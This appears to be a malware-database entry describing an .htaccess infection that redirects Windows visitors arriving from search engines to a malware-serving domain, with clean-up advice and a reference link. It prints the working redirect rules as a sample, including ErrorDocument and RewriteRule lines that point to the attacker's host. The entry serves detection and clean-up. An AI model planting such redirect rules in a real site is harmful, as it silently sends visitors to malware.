Malware Entries

Description:

This attack uses .htaccess to redirect users to a site serving malware (or spam).

Loads malware from:

http://blog.natebennettfleming.com/ main.php
And other domains.

Affecting:

Any type of web site (no specific target).

Clean up and details:

Remove offendin code from .htaccess.

Links::
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html

Malware sample:

ErrorDocument 500 http://blog.natebennettfleming.com/main.php?i=Jc2tgtAbrvymixjzUMtFypEZ&e=0 ErrorDocument 502 http://blog.natebennettfleming.com/main.php?i=Jc2tgtAbrvymixjzUMtFypEZ&e=2 RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] .. RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC] RewriteCond %{HTTP_USER_AGENT} .*Windows.* RewriteRule .* http://blog.natebennettfleming.com/main.php?h=%{HTTP_HOST}&i=Jc2tgtAbrvymixjzU MtFypEZ&e=r [R,L]